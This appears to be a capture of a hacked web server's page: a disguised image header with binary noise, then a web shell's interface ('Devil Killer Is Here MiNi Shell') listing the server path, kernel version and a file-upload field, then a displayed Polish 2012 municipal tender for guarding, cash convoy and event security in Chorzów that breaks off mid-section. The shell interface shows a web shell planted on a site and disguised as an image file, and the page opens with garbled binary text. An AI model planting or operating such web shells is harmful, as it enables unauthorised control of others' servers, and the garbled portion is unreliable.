JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121129/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121129/479348-N-2012.html

<p class="kh_header"><b>Chorzów: Ochrona  obiektów MORiS, konwój wartości pieniężnych oraz ochrona imprez
i meczy ligowych, monitoring boiska Orlik</b><br>
<b>Numer ogłoszenia: 479348 - 2012; data zamieszczenia: 29.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Rekreacji i Sportu , ul. Dąbrowskiego 113, 41-500 Chorzów, woj. śląskie, tel. 032 2417050, 2411313, faks 032 2417055.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona  obiektów MORiS, konwój wartości pieniężnych oraz ochrona imprez
i meczy ligowych, monitoring boiska Orlik.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania pod nazwą:
Ochrona obiektów MORiS, konwój wartości pieniężnych oraz ochrona imprez i meczy ligowych,monitoring boiska Orlik.
Zakres zadania obejmuje wykonanie następujących usług:
- ochrona obiektów MORiS - wykaz obiektów w załączniku nr 4 do siwz , ochrona lodowiska sezonowego przy ul. Katowickiej 6 zgodnie z   ustawą z dnia 22.08.1997r. o ochronie osób i mienia ( Dz.U. z 2005r., nr 145, poz.1221 z późniejszymi zmianami) - zakres obowiązków ustalono w załączniku nr 1 do niniejszej specyfikacji. Zamawiający zastrzega sobie prawo zmniejszenia ilości dni ochrony lodowiska, jeżeli nastąpi wcześniejsze jego zamknięcie z powodu warunków atmosferycznych.
- konwój wartości pieniężnych zgodnie z rozporządzeniem MSWiA z dnia 7 września 2010r  w sprawie wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowanych przez przedsiębiorców i inne jednostki organizacyjne (Dz.U z 2010r. nr 166, poz.1128) - konwój zgodnie z założeniami załącznika nr 2 do niniejszej siwz. Zamawiający zastrzega sobie prawo zmniejszenia ilości konwojów ze względu na wcześniejsze zamknięcie lodowiska z powodu warunków atmosferycznych.
- Ochrona imprez organizowanych przez Zamawiającego zgodnie z ustawą z dnia 20.03.2009r. o bezpieczeństwie imprez masowych( Dz.U. z 2009r. Nr 62, poz. 504 z późniejszymi zmianami)  - wykaz imprez stanowi  załącznik nr 3 dołączony do niniejszej  SIWZ. Usługi ochrony imprez będą obejmować: ochronę  porządku publicznego, sceny, sprzętu technicznego oraz system patroli po wyznaczonych trasach , celem ochrony bezpieczeństwa uczestników imprez.
Obowiązki Wykonawcy określają w szczególności art.22.1. ustawy z dnia 20.03.2009r. o bezpieczeństwie imprez masowych ( Dz.U. z 2009r. Nr 62 poz. 504 z późniejszymi zmianami), które Wykonawca zobowiązuje się stosować.
Zakres ochrony sceny i sprzętu technicznego, obowiązki służb porządkowych ustalone będą  na każdej imprezie przez kierownika ds. bezpieczeństwa wyznaczonego przez Zamawiającego.
- Ochrona meczy ligowych organizowanych przez Zamawiającego zgodnie z ustawą z dnia 20.03.2009r. o bezpieczeństwie imprez masowych (Dz.U. z 2009r. Nr 62, poz. 504 z późniejszymi zmianami) - usługa będzie obejmować ochronę porządku publicznego poprzez zabezpieczenie trybun celem zapewnienia bezpieczeństwa uczestników rozgrywek meczy ligowych w ilościach wskazanych w załączniku nr 4 do SIWZ.
- monitoring boiska Orlik usługa będzie obejmować monitoring całodobowy  w okresie i miejscu wskazanym w załączniku nr 4 do SIWZ.
Zamawiający zastrzega, że ilość imprez masowych i rekreacyjno-sportowych, meczy oraz miejsca ich odbywania mogą ulec zmianie.

Na podstawie załącznika nr 4 i danych zawartych w siwz, należy opracować kosztorys- wycenę załącznik nr 9 wszystkich usług objętych niniejszym zamówieniem. Zawierać on  winien:

a) Ochrona Imprezy:
cenę netto i brutto każdej z imprez, cenę łączną netto i brutto wszystkich imprez, jak  również cenę  netto i brutto za roboczogodzinę pracownika ochrony oraz dowodzącego - patrz załącznik nr 4  do niniejszej SIWZ.

b) Ochrona obiektów MORiS, Ochrona lodowiska sezonowego  :
cenę netto i brutto za jedną roboczogodzinę pracownika ochrony, całkowity koszt za ochronę obiektów netto i brutto wyliczony na podstawie załącznika nr 4 do niniejszej SIWZ.
 
c) Konwój wartości pieniężnych : 
cenę netto i brutto za jedną usługę konwoju, całkowity koszt za usługę konwojowania netto i brutto wyliczony na podstawie załącznika nr 4 do niniejszej SIWZ

d) Ochrona meczy ligowych :
cenę netto i brutto za jedną roboczogodzinę pracownika ochrony, całkowity koszt za ochronę obiektów netto i brutto wyliczony na podstawie załącznika nr 4 do niniejszej SIWZ. 

e) monitoring  boiska Orlik:
całoroczny monitoring- uwzględnić abonament za monitoring za 1 m-cx 12 m-cy  na podstawie załącznika nr 4 do niniejszej SIWZ 


4. Termin wykonania zamówienia:

    a) ochrona obiektów MORiS od 01.01.2013r.od godz. 6:00 do dnia 01.01.2014r. do godz. 06:00
    b) ochrona lodowiska  od 18.11.2013r. do zakończenia sezonu tj. 31.03.2014r. 
    c) monitoring  boiska Orlik od dnia 01.01.2013r. - 01.01.2014r.
    d) konwój wartości pieniężnych: od 05.01.2013r. do 23.02.2014r. 
    e) ochrona imprez  od 01.01.2013r. do 01.01.2014r.
    f) ochrona meczy ligowych od 01.01.2013r. do 01.01.2014r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>w okresie 3 ostatnich lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usługi, zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na rozszerzeniu usługi</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.77.30.00-5, 79.71.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium

Zamawiający  żąda wniesienia wadium w wysokości  6.000,00 zł. (słownie: sześć tysięcy złotych 00/100)
1)Wadium wnosi się przed upływem terminu składania ofert.
2) Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach  udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr. 109, poz.1158z póź. zm.)
3) Wadium wnoszone w pieniądzu wpłaca się na rachunek bankowy 
            nr  45 1050 1243 1000 0022 4984 4891
     Należy złożyć go w taki sposób, aby w chwili upływu terminu do składania ofert znajdowało się na koncie Zamawiającego.   
4) Wadium w formie niepieniężnej winno zawierać w swojej treści nieodwołalne bezwarunkowe oświadczenie o zobowiązaniu do przekazania Zamawiającemu kwoty: 6 000,00 tys.( słownie: sześć tysięcy złotych 00/100) na pierwsze wezwanie w razie zaistnienia okoliczności wymienionych w art.46 ust. 4a i 5 ustawy pzp.
5) Wadium w formie niepieniężnej składa się wyłącznie w oryginale, w tym przypadku należy do oferty dołączyć kserokopię, a oryginał dołączyć w osobnej kopercie i złożyć ją łącznie z ofertą, bądź zdeponować ją w kasie MORiS</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
a)  posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania 
b)   posiadania wiedzy i doświadczenia 
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do   wykonania zamówienia 
      d)  sytuacji ekonomicznej i finansowej 

W szczególności o zamówienie mogą ubiegać się Wykonawcy, którzy posiadają:
a) ustawowe uprawnienia do prowadzenia działalności gospodarczej, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b) niezbędną wiedzę i doświadczenie - tj. wykonanych/wykonywanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierający co najmniej 3 zadania odpowiadające swoim rodzajem przedmiotowi niniejszego zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że zamówienia te zostały wykonane należycie. 
Za zadanie odpowiadające przedmiotowi zamówienia zamawiający uzna :  
- ochrona obiektów na kwotę  nie mniejszą niż 80.000,-zł brutto., 
- ochrona imprez masowych na kwotę nie mniejszą niż 60.000,-zł.brutto            
-  konwój wartości pieniężnych na kwotę nie mniejszą niż 10.000,-zł. brutto
Zamawiający wymaga, aby Wykonawca wykazał się wykonaniem co najmniej po jednym z każdego z wyżej wymienionych zadań- zał. 6</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
Zamawiający uzna spełnienie warunku, jeżeli Wykonawca przedłoży:
- imienną listę co najmniej 20 osób, zawierającą  imię i nazwisko, nr zaświadczenia o  odbyciu przeszkolenia w zakresie  wykonywania zadań członka służb porządkowych i datę jego wydania,
- imienną listę 4 osób tzw. dowodzących łącznie z kserokopią zaświadczenia o ukończeniu kursu dla kierowników ds. bezpieczeństwa
- imienną listę co najmniej 4 osób upoważnionych do przewozu, ochrony i konwojowania wartości pieniężnych, łącznie z kserokopią licencji POF. Lista winna zawierać imię i nazwisko, nr licencji POF i stopień licencji POF,
- imienną listę 10 osób posiadających przynajmniej 2 letnie doświadczenie w ochronie obiektów(potwierdzić odpowiednimi dokumentami) 
  Wykonawca zobowiązuje się powierzyć świadczenie usług objętych zamówieniem pracownikom nie karanym za przestępstwa przeciwko mieniu i przeciwko wiarygodności dokumentów. Na pierwsze żądanie zamawiającego wykonawca zobowiązany będzie przedłożyć Zamawiającemu zaświadczenia z Krajowego Rejestru Karnego osób skierowanych do pracy w wykonaniu niniejszego zamówienia.(KRK nie dołączać do oferty)
- przedłoży oświadczenie, że dysponuje co najmniej 2 grupami interwencyjnymi dwuosobowymi, wyposażonymi w broń palną, wyposażonymi w łączność radiową z osobami sprawującymi bezpośrednią ochronę fizyczną we wszystkich obiektach. 
- imienną listę 4 osób z grupy interwencyjnej wraz z numerami rejestracyjnymi 2 samochodów. Wymagany czas dojazdu grupy interwencyjnej 15 min. W przypadku ochrony obiektów wskazana wizja lokalna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
Zamawiający uzna spełnienie warunku, jeżeli Wykonawca przedłoży:
- imienną listę co najmniej 20 osób, zawierającą  imię i nazwisko, nr zaświadczenia o  odbyciu przeszkolenia w zakresie  wykonywania zadań członka służb porządkowych i datę jego wydania,
- imienną listę 4 osób tzw. dowodzących łącznie z kserokopią zaświadczenia o ukończeniu kursu dla kierowników ds. bezpieczeństwa
- imienną listę co najmniej 4 osób upoważnionych do przewozu, ochrony i konwojowania wartości pieniężnych, łącznie z kserokopią licencji POF. Lista winna zawierać imię i nazwisko, nr licencji POF i stopień licencji POF,
- imienną listę 10 osób posiadających przynajmniej 2 letnie doświadczenie w ochronie obiektów(potwierdzić odpowiednimi dokumentami) 
  Wykonawca zobowiązuje się powierzyć świadczenie usług objętych zamówieniem pracownikom nie karanym za przestępstwa przeciwko mieniu i przeciwko wiarygodności dokumentów. Na pierwsze żądanie zamawiającego wykonawca zobowiązany będzie przedłożyć Zamawiającemu zaświadczenia z Krajowego Rejestru Karnego osób skierowanych do pracy w wykonaniu niniejszego zamówienia.(KRK nie dołączać do oferty)
- przedłoży oświadczenie, że dysponuje co najmniej 2 grupami interwencyjnymi dwuosobowymi, wyposażonymi w broń palną, wyposażonymi w łączność radiową z osobami sprawującymi bezpośrednią ochronę fizyczną we wszystkich obiektach. 
- imienną listę 4 osób z grupy interwencyjnej wraz z numerami rejestracyjnymi 2 samochodów. Wymagany czas dojazdu grupy interwencyjnej 15 min. W przypadku ochrony obiektów wskazana wizja lokalna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć wszelkie niezbędne oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu.
Oświadczenia i wykazy składa się wyłącznie w oryginale.

Pozostałe dokumenty składa się w oryginale lub w kopii z poświadczeniem Wykonawcy o zgodności kopii z oryginałem. Dokumenty obcojęzyczne należy złożyć z tłumaczeniem na język polski dokonanym lub poświadczonym przez wykonawcę.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku korzystania z zasobów innych podmiotów kopie dokumentów dotyczących wykonawcy lub tych podmiotów mogą być poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty.

Zaleca się składanie dokumentów w porządku wymienionym w punkcie  10, 5 i 6 siwz. 
Zaleca się ponumerowanie stron.
Jeśli ofertę podpisała osoba nie występująca w wypisie z KRS, zaświadczeniu o wpisie do ewidencji działalności gospodarczej, albo w innym dokumencie potwierdzającym uprawnienia do prowadzenia działalności gospodarczej i potwierdzającym uprawnienia do reprezentacji, do oferty należy dołączyć pełnomocnictwo do podpisania oferty w oryginale bądź kopii potwierdzonej notarialnie.
Wykonawcy składający wspólną ofertę, którzy ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, dołączą do oferty stosowne pełnomocnictwo w oryginale bądź kopii potwierdzonej notarialnie.

Wykonawcy występujący wspólnie podpisują ofertę zgodnie z pełnomocnictwem dołączonym do oferty, ponosząc solidarną odpowiedzialność za wykonanie zamówienia.
W przypadku ofert wspólnych przed podpisaniem umowy Wykonawcy muszą dostarczyć:
- konsorcja: umowę konsorcjum, określającą sposób współdziałania, zakres prac przewidzianych do wykonania dla każdego z członków konsorcjum przy realizacji zamówienia, sposób rozliczania się w przypadku wygrania przetargu, czas trwania oraz sposób rozwiązania
- spółki cywilne: kopię umowy spółki cywilnej
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy     ( wiedza i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów), a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający  żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt.6 2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - okres prowadzenia działalności - 25</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
